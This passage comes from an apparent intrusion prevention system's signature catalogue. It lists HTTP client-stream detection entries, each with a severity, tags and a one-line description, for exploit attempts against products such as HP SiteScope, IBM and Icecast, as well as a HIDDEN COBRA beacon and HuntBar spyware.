First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Description:
Back to top

HTTP_CS-HIDDEN-COBRA-Beacon-COPPERHEDGE

About this situation: A suspected HIDDEN COBRA beacon request detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: HIDDEN-COBRA
Description:
Back to top

HTTP_CS-Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Horde Project Groupware Webmail Edition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Horde Groupware Webmail Edition, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-HorizontCMS-Arbitrary-PHP-File-Upload

About this situation: An attempt to exploit a vulnerability in HorizontCMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, HorizontCMS, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: HorizontCMS-Arbitrary-PHP-File-Upload
Description:
Back to top

HTTP_CS-HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection

About this situation: An attempt to exploit a vulnerability in HP Data Protector for Personal Computers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2011, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1394-5242
Vulnerability: HP-Data-Protector-Multiple-Products-Finishedcopy-SQL-Injection
Description:
Back to top

HTTP_CS-HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection

About this situation: An attempt to exploit a vulnerability in HP Data Protector for Personal Computers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2011, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: HP-Data-Protector-Multiple-Products-Getpolicies-SQL-Injection
Description:
Back to top

HTTP_CS-HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection

About this situation: An attempt to exploit a vulnerability in HP Data Protector for Personal Computers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2011, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1394-5242
Vulnerability: HP-Data-Protector-Multiple-Products-LogClientInstallation-SQL-Injection
Description:
Back to top

HTTP_CS-HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection

About this situation: An attempt to exploit a vulnerability in HP Data Protector for Personal Computers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Data Protector, CVE2011, Any Operating System not specific, HP Data Protector not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1394-5242
Vulnerability: HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection
Description:
Back to top

HTTP_CS-HP-LoadRunner-Buffer-Overflow

About this situation: An attempt to exploit an HP LoadRunner Buffer Overflow vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, HP LoadRunner, CVE2013, HP LoadRunner not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: HP-LoadRunner-Buffer-Overflow
Description:
Back to top

HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Virtual User Generator detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-562-5211
Vulnerability: HP-LoadRunner-Virtual-User-Generator-Emulationadmin-Two-Directory-Traversal
Description:
Back to top

HTTP_CS-HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Virtual User Generator detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP LoadRunner, CVE2013, Any Operating System not specific, HP LoadRunner not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: HP-LoadRunner-Virtual-User-Generator-Savecoderulefile-Directory-Traversal
Description:
Back to top

HTTP_CS-HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-OpenView-Network-Node-Manager-HTTP-Handling-Buffer-Overflow
Description:
Back to top

HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe detected
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-1333-5242
Vulnerability: HP-OpenView-NNM-getnnmdata.exe-Cgi-ICount-Parameter-BOF
Description:
Back to top

HTTP_CS-HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in the HP OpenView Network Node Manager CGI application getnnmdata.exe detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-754-5211
Vulnerability: HP-OpenView-NNM-getnnmdata.exe-Cgi-MaxAge-Parameter-BOF
Description:
Back to top

HTTP_CS-HP-Operations-Agent-Opcode-0x34-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Operations Agent detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Operations Agent, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: HP-Operations-Agent-Performance-Component-Last-Chunk-Buffer-Overflow
Description:
Back to top

HTTP_CS-HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Performance Agent detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Operations Agent, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-470-5211
Vulnerability: HP-Operations-Agent-Performance-Component-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass

About this situation: An attempt to exploit a policy bypass vulnerability in HP Performance Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Performance Manager, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1588-5242
Vulnerability: HTTP-HP-Performance-Manager-Apache-Tomcat-Policy-Bypass
Description:
Back to top

HTTP_CS-HP-Procurve-Manager-Snac-File-Upload

About this situation: An attempt to exploit an HP Procurve Manager Snac File Upload vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP ProCurve Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-780-5211
Vulnerability: HP-Procurve-Manager-Snac-File-Upload
Description:
Back to top

HTTP_CS-HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP Identity Driven Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Identity Driven Manager, HP ProCurve Manager, HP ProCurve Manager Plus, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: HP-Procurve-Manager-Snac-Updatedomaincontrollerservlet-Code-Execution
Description:
Back to top

HTTP_CS-HP-Release-Control-Authenticated-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in HP Release Control detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Release Control, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-590-5211
Vulnerability: HP-Release-Control-Authenticated-Privilege-Escalation
Description:
Back to top

HTTP_CS-HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Service Virtualization detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Service Virtualization, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1792-5242
Vulnerability: HP-Service-Virtualization-Autopass-License-Server-Directory-Traversal
Description:
Back to top

HTTP_CS-HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-549-5211
Vulnerability: HP-Sitescope-Issuesiebelcmd-Soap-Request-Code-Execution
Description:
Back to top

HTTP_CS-HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: HP-Sitescope-Loadfilecontent-Soap-Request-Information-Disclosure
Description:
Back to top

HTTP_CS-HP-Sitescope-Log-Analyzer-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-650-5211
Vulnerability: HP-Sitescope-Log-Analyzer-Information-Disclosure
Description:
Back to top

HTTP_CS-HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: HP-Sitescope-Soap-Call-Apipreferenceimpl-Multiple-Security-Bypass
Description:
Back to top

HTTP_CS-HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: HP-Sitescope-Soap-Call-Apisitescopeimpl-Multiple-Information-Disclosures
Description:
Back to top

HTTP_CS-HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: HP-Sitescope-Soap-Call-RunOMAgentCommand-Command-Injection
Description:
Back to top

HTTP_CS-HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization
Description:
Back to top

HTTP_CS-HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: HPE-Intelligent-Management-Center-Mibfileservlet-File-Directory-Traversal
Description:
Back to top

HTTP_CS-HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1013-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: HPE-Intelligent-Management-Center-Plat-Flexfileupload-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1745-5242
Vulnerability: HPE-Intelligent-Management-Center-Webdmservlet-Insecure-Deserialization
Description:
Back to top

HTTP_CS-HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Operations Orchestration detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Operations Orchestration, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: HPE-Operations-Orchestration-Beanutils-Insecure-Deserialization
Description:
Back to top

HTTP_CS-HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Operations Orchestration detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Operations Orchestration, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-991-5242
Vulnerability: HPE-Operations-Orchestration-Central-Remoting-Insecure-Deserialization
Description:
Back to top

HTTP_CS-HPE-Operations-Orchestration-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HPE Operations Orchestration detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Operations Orchestration, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-865-5242
Vulnerability: HPE-Operations-Orchestration-Insecure-Deserialization
Description:
Back to top

HTTP_CS-HTML-In-HTTP-POST

About this situation: HTML was detected in a HTTP POST request
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTML-In-HTTP-POST
Description:
Back to top

HTTP_CS-HTTP2-Connection-Preface

About this situation: HTTP/2 connection preface was seen
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Description:
Back to top

HTTP_CS-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2022-01, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1461-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
Description:
Back to top

HTTP_CS-HTTP_Request-TRACE-2

About this situation: The HTTP request method TRACE was seen in an HTTP request.
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: HTTP_Request-TRACE-2
Description:
Back to top

HTTP_CS-HuntBar-SiteReview

About this situation: HuntBar site review activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, HuntBar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1374-5242
Vulnerability: HuntBar
Description:
Back to top

HTTP_CS-IBM-Data-Risk-Manager-Unathenticated-RCE

About this situation: An attempt to exploit a vulnerability in IBM Data Risk Manager detected.
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, IBM Data Risk Manager, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: IBM-Data-Risk-Manager-Unathenticated-RCE
Description:
Back to top

HTTP_CS-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow

About this situation: Attempt to exploit a stack buffer overflow vulnerability in the IBM Lotus Domino Web Server application detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2008, Any Operating System not specific, Lotus Domino not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-IBM-Lotus-Domino-Web-Server-HTTP-Header-Buffer-Overflow
Description:
Back to top

HTTP_CS-IBM-Operational-Decision-Manager-Datasource-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in IBM Operational Decision Manager detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, IBM Operational Decision Manager, CVE2024, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: IBM-Operational-Decision-Manager-Datasource-JNDI-Injection
Description:
Back to top

HTTP_CS-IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Spectrum Protect Plus detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Spectrum Protect Plus, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: IBM-Spectrum-Protect-Plus-Uploadhttpscertificate-Command-Injection
Description:
Back to top

HTTP_CS-IBM-System-Director-Agent-DLL-Injection

About this situation: An attempt to exploit an IBM System Director Agent DLL Injection vulnerability detected.
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, IBM Director Agent, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: IBM-System-Director-Agent-DLL-Injection
Description:
Back to top

HTTP_CS-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Provisioning Manager Express for Software Distribution, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
Description:
Back to top

HTTP_CS-Icecast-Multiple-Header-Line-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow by sending lots of headers
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Icecast, CVE2004, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-506-5211
Vulnerability: Icecast-Server-HTTP-Header-BOF
Description:
Back to top

HTTP_CS-Icecast-Server-Authurl-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Xiph.Org Icecast detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Icecast, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP-CS_Icecast-Server-Authurl-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CS-Icecast-Server-Base64-Authorization-BOF

About this situation: Attempt to exploit a buffer overflow in Icecast server
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Icecast, CVE2004, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-507-5211
Vulnerability: Icecast-Server-Base64-Authorization-Request-BOF
Description:
Back to top

HTTP_CS-ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification

About this situation: An attempt to exploit a vulnerability in ICL ScadaFlex II SCADA Controllers detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ICL ScadaFlex, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: ICL-ScadaFlex-II-SCADA-Controllers-Remote-File-Modification
Description:
Back to top

HTTP_CS-iCMS-admincp.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in iCMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, iCMS, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: iCMS-admincp.php-SQL-Injection
Description:
Back to top

HTTP_CS-Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-698-5211
Vulnerability: Ignite-Realtime-OpenFire-Server-props.jsp-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Ignite-Realtime-OpenFire-User-create.jsp-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ignite Realtime Openfire, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-690-5211
Vulnerability: Ignite-Realtime-OpenFire-User-password.jsp-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-IIS-Asp-Server-Side-Include-Function-Vulnerability

